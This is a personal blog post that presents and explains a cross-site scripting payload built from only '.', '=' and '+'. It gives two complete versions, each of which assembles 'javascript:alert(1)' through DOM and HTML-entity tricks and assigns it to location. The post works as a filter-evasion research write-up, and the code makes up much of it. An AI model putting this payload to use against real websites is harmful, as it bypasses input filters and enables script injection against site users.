Physuru's Blog

Restricted-character XSS for fun

Restricted-character XSS for fun

I have created an XSS payload which:

In fact, the only special characters it uses are ., =, and + (aside from \n and such). In this blog post, I provide the payload and explain how it works.

The payload

amp=new Object
amp.valueOf=String.prototype.bold
document.body.innerHTML=amp+0
amp=document.body.firstElementChild
amp.innerText=document.body.innerHTML
amp.className=amp.innerHTML
amp.classList.valueOf=String.prototype.charAt
amp=amp.classList

location.hash=97
document.body.innerHTML=amp+location.hash
a=document.body.innerText
location.hash=99
document.body.innerHTML=amp+location.hash
c=document.body.innerText
location.hash=105
document.body.innerHTML=amp+location.hash
i=document.body.innerText
location.hash=106
document.body.innerHTML=amp+location.hash
j=document.body.innerText
location.hash=112
document.body.innerHTML=amp+location.hash
p=document.body.innerText
location.hash=114
document.body.innerHTML=amp+location.hash
r=document.body.innerText
location.hash=115
document.body.innerHTML=amp+location.hash
s=document.body.innerText
location.hash=116
document.body.innerHTML=amp+location.hash
t=document.body.innerText
location.hash=118
document.body.innerHTML=amp+location.hash
v=document.body.innerText

location.hash=58
document.body.innerHTML=amp+location.hash
colon=document.body.innerText

location.hash=40
document.body.innerHTML=amp+location.hash
lpar=document.body.innerText
location.hash=41
document.body.innerHTML=amp+location.hash
rpar=document.body.innerText

location=j+a+v+a+s+c+r+i+p+t+colon+alert.name+lpar+1+rpar

The explanation

amp=new Object creates the variable amp and assigns a new instance of Object to it.
The following line assigns String.prototype.bold to amp.valueOf. valueOf is a function which is called to convert an object to a primitive type (such as a string). On the next line I wrote amp+0, which implicitly calls amp.valueOf, which actually calls String.prototype.bold on amp. String.prototype.bold is a simple function which returns the input (this) string, in the middle of <b> and </b>. If the input to bold is not a string (in this case, it's an object), it'll convert it to a string via its toString function. So, amp+0 yields <b>[object Object]</b>0, which is assigned to document.body.innerHTML.
The next line assigns a representation of the <b> node to amp.
The next line assigns document.body.innerHTML to amp.innerText, which means that amp's literal text content will be <b>[object Object]</b>0. After the innerText assignment, amp's innerHTML is equal to &lt;b&gt;[object Object]&lt;/b&gt;0. That's important, because the ampersand at the beginning of that string is almost re-usable. The ampersand is very crucial to my approach of getting other usable characters. I wrote that the ampersand is almost re-usable; for it to be re-usable in any meaningful way, it is required that I can get the ampersand alone, without the trailing characters.
To separate the ampersand, I obviously could not do amp.innerHTML[0] in this context, as that would violate the rule which prohibits the use of [ and ]. In order to separate the ampersand, I abused DOM element classes and String.prototype.charAt. className is a representation of an element's classes as one contiguous string. classList is another representation of the same data, but as a DOMTokenList which contains strings. (toString when called on a DOMTokenList will return a meaningful string representation of the DOMTokenList's value/content.) charAt is a function which returns the character at the n-th (where n is 0 by default) index of the target (this) - if the target is not a string originally, it is converted to a string via its toString function. As amp.innerHTML was assigned to className, the first character in the string resulting from converting classList to a string will be &. Therefore, calling charAt on the classList (via valueOf) will result in a single ampersand.
In the next two lines, String.prototype.charAt is assigned to amp.classList.valueOf, then amp.classList is assigned to amp (meaning that amp will effectively be an ampersand in upcoming concatenations). Note: the valueOf function doesn't seem like it can be implictly called on strings, hence why I set valueOf on classList rather than className.

The next section uses location.hash and innerHTML to create a lot of re-usable characters.
For example, to create a colon, 58 is assigned to location.hash. 58 is the colon's Unicode codepoint in base 10 (not hexadecimal). Then, amp+location.hash is assigned to document.body.innerHTML. For the colon section, amp+location.hash results in &#58, which is an okay HTML symbol for the colon (according to the spec, there should be a semi-colon directly after the numeric part, but it works). The HTML parser replaces the &#58 with a colon so, in the next line, document.body.innerText is assigned to colon (which makes colon a single colon in a string).

The last line of my payload builds the string "javascript:alert(1)", then assigns it to location.

Update

I've improved my payload as to not assign to location.hash, and it no longer assigns to document.body.innerHTML.

elem=new Option
elem.classList.valueOf=String.prototype.charAt

elem.innerText=elem.outerHTML
elem.className=elem.innerHTML
amp=elem.classList+new String

htag=new Text
elem.className=htag.nodeName
htag=elem.classList+new String

elem.innerHTML=amp+htag+97
a=elem.innerText
elem.innerHTML=amp+htag+99
c=elem.innerText
elem.innerHTML=amp+htag+105
i=elem.innerText
elem.innerHTML=amp+htag+106
j=elem.innerText
elem.innerHTML=amp+htag+112
p=elem.innerText
elem.innerHTML=amp+htag+114
r=elem.innerText
elem.innerHTML=amp+htag+115
s=elem.innerText
elem.innerHTML=amp+htag+116
t=elem.innerText
elem.innerHTML=amp+htag+118
v=elem.innerText

elem.innerHTML=amp+htag+58
colon=elem.innerText

elem.innerHTML=amp+htag+40
lpar=elem.innerText
elem.innerHTML=amp+htag+41
rpar=elem.innerText

location=j+a+v+a+s+c+r+i+p+t+colon+alert.name+lpar+1+rpar